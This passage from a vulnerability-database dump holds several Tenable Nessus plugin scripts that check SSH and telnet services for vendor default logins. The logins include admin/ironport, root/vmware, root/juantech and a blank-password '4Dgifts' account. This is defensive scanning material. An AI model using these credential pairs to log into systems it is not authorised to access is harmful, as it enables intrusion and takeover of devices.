script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/ssh\", 32022);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:05", "description": "The account 'admin' on the remote host has the password 'ironport'. An attacker may leverage this issue to gain access to the affected system and launch further attacks against it.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-04-02T00:00:00", "type": "nessus", "title": "Default Password (ironport) for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_IRONPORT.NASL", "href": "https://www.tenable.com/plugins/nessus/73298", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"ironport\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73298);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (ironport) for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the password 'ironport'. An\nattacker may leverage this issue to gain access to the affected system\nand launch further attacks against it.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (!thorough_tests && !get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, cmd:'who', cmd_regex:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, cmd:'who', cmd_regex:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:23", "description": "The account 'enablediag' on the remote host has the password 'ironport'. An attacker may leverage this issue to gain access to the affected system and launch further attacks against it.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-04-02T00:00:00", "type": "nessus", "title": "Default Password (ironport) for 'enablediag' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ENABLEDIAG.NASL", "href": "https://www.tenable.com/plugins/nessus/73299", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"enablediag\";\npassword = \"ironport\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73299);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (ironport) for 'enablediag' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'enablediag' on the remote host has the password\n'ironport'. An attacker may leverage this issue to gain access to the\naffected system and launch further attacks against it.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, cmd:'print', cmd_regex:'Current', noexec:TRUE, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, cmd:'print', cmd_regex:'Current', noexec:TRUE, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:09:07", "description": "The account 'root' on the remote host has the password 'vmware'. An attacker may leverage this to gain administrator access to the affected system.\n\nNote that VMware vCenter Support Assistant Appliance and VMware vCenter Server Appliance are known to use these credentials.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-08-04T00:00:00", "type": "nessus", "title": "Default Password (vmware) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_VMWARE.NASL", "href": "https://www.tenable.com/plugins/nessus/76993", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"vmware\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76993);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (vmware) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'vmware'. An\nattacker may leverage this to gain administrator access to the\naffected system.\n\nNote that VMware vCenter Support Assistant Appliance and VMware\nvCenter Server Appliance are known to use these credentials.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:05:40", "description": "The account 'root' on the remote host has the password 'f00b@r'.\n\nAn attacker may leverage this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-06-23T00:00:00", "type": "nessus", "title": "Default Password (f00b@r) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_F00BAR.NASL", "href": "https://www.tenable.com/plugins/nessus/76191", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"root\";\npassword = \"f00b@r\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76191);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (f00b@r) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'f00b@r'.\n\nAn attacker may leverage this issue to gain administrative access to\nthe affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:50", "description": "The account '4Dgifts' has no password set. An attacker may use it to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded '4Dgifts' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_4DGIFTS.NASL", "href": "https://www.tenable.com/plugins/nessus/11243", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11243);\n script_version(\"1.37\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded '4Dgifts' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a blank password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account '4Dgifts' has no password set. An attacker may use it to gain \nfurther privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"os_fingerprint.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif ( ! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n{\n os = get_kb_item(\"Host/OS\");\n if ( os && \"IRIX\" >!< os )\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set, and the remote OS is not IRIX.\");\n}\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:39:54", "description": "The account 'trans' on the remote host has the password 'trans'. An attacker may leverage this issue to gain access to the affected system and launch further attacks against it.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2008-09-04T00:00:00", "type": "nessus", "title": "Default Password (trans) for 'trans' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_TRANS_TRANS.NASL", "href": "https://www.tenable.com/plugins/nessus/34084", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n# \n\naccount = \"trans\";\npassword = \"trans\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34084);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (trans) for 'trans' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'trans' on the remote host has the password 'trans'. An\nattacker may leverage this issue to gain access to the affected system\nand launch further attacks against it.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:26", "description": "The account 'root' on the remote host has the default password 'juantech'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'juantech' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_JUANTECH.NASL", "href": "https://www.tenable.com/plugins/nessus/94391", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"juantech\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94391);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'juantech' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'juantech'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 